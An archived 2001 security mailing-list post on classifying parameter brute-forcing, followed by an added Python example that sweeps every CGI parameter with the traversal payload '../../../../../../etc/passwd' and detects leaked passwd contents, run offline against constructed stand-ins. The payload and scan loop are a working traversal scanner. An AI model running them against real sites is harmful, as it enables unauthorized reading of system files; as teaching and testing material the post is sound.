From: Jeremiah Grossman (jeremiahwhitehatsec.com)
Date: Mon Oct 01 2001 - 12:09:16 CDT
Dennis Groves wrote:
> > hi all,
> > sorry for this late input/question .. but .. which category does
> > "PARAMETER BRUTE-FORCING/GUESSING"
> What will you do with this information? How does it break a web application?
> I am inclined to think that it belongs in INFORMATION GATHERING as CGI
> PARAMETER ENUMERATION.
This is a little about what someone said before... "attacks covering multiple
Parameter Brute Forcing is a real attack and can be used for both enumeration
AND penetration. Case in point...
the recent Apache bug that can gather active usernames on the system... or
scripting a parameter tampering attack that replaces all parameters in all
CGIs on a site with "../../../../../../etc/passwd". Yes, this has worked on
many high profile sites.
So, as you can see, it's both.
The kind of thing we have to work through and not get hung up on.
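The scripted attack Jeremiah describes (swap every parameter of every CGI for a traversal string and watch for /etc/passwd coming back) is easy to sketch. The code below is an added example written for this archive page, not code from the original post or from Neohapsis. It assumes a hypothetical site map and runs against constructed in-memory stand-ins for two CGIs (one vulnerable, one that canonicalises and rejects escapes) instead of making HTTP requests, so it runs offline; the `fetch()` function is where a real scanner would issue the request.

```python
# Added example, not from the original post. Parameter tampering with a
# directory-traversal payload, driven against constructed in-memory stand-ins
# for a site's CGIs so it runs offline. All names and URLs are hypothetical.
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode
import posixpath

TRAVERSAL = "../../../../../../etc/passwd"

# Constructed fake filesystem standing in for the web host.
FAKE_FS = {
    "/var/www/docs/readme.txt": "Welcome to the demo site.\n",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www:x:33:33:www:/var/www:/sbin/nologin\n",
}

def vulnerable_cgi(params):
    """Constructed stand-in for a CGI that joins a user-supplied name onto
    its docroot and never checks that the result stayed inside it."""
    name = params.get("file", "readme.txt")
    path = posixpath.normpath(posixpath.join("/var/www/docs", name))
    return FAKE_FS.get(path, "404 not found")

def safe_cgi(params):
    """Constructed stand-in that canonicalises and refuses to leave the docroot."""
    name = params.get("page", "readme.txt")
    path = posixpath.normpath(posixpath.join("/var/www/docs", name))
    if not path.startswith("/var/www/docs/"):
        return "403 forbidden"
    return FAKE_FS.get(path, "404 not found")

# Hypothetical site map: CGI path -> handler. A real scan would hit these over HTTP.
SITE = {"/cgi-bin/view": vulnerable_cgi, "/cgi-bin/show": safe_cgi}

def tamper(url, payload):
    """Return (param, url) variants: each parameter replaced in turn, then
    all parameters at once, which is the blanket swap the post describes."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    variants = []
    for i, (key, _) in enumerate(pairs):
        q = [(k, payload if j == i else v) for j, (k, v) in enumerate(pairs)]
        variants.append((key, urlunsplit(parts._replace(query=urlencode(q)))))
    if len(pairs) > 1:
        q = [(k, payload) for k, _ in pairs]
        variants.append(("*", urlunsplit(parts._replace(query=urlencode(q)))))
    return variants

def looks_like_passwd(body):
    """Cheap oracle: the root entry that opens /etc/passwd."""
    return "root:x:0:0:" in body

def fetch(url):
    """Constructed transport: dispatch to the in-memory handler by path.
    Replace with an HTTP client to run against a real target you own."""
    parts = urlsplit(url)
    handler = SITE.get(parts.path)
    if handler is None:
        return "404 not found"
    return handler(dict(parse_qsl(parts.query, keep_blank_values=True)))

def scan(urls, payload=TRAVERSAL):
    """Return (cgi path, parameter) pairs whose tampered request leaked passwd."""
    findings = []
    for url in urls:
        for param, variant in tamper(url, payload):
            if looks_like_passwd(fetch(variant)):
                findings.append((urlsplit(url).path, param))
    return findings

if __name__ == "__main__":
    seeds = [
        "http://example.test/cgi-bin/view?file=readme.txt&lang=en",
        "http://example.test/cgi-bin/show?page=readme.txt",
    ]
    for path, param in scan(seeds):
        print("traversal via", path, "parameter", param)
```

Replacing parameters one at a time tells you which parameter is the weak one (enumeration); the all-at-once variant is the blunt version that simply tells you the CGI is exploitable (penetration). The same loop takes any other payload list, so it doubles as a parameter fuzzer.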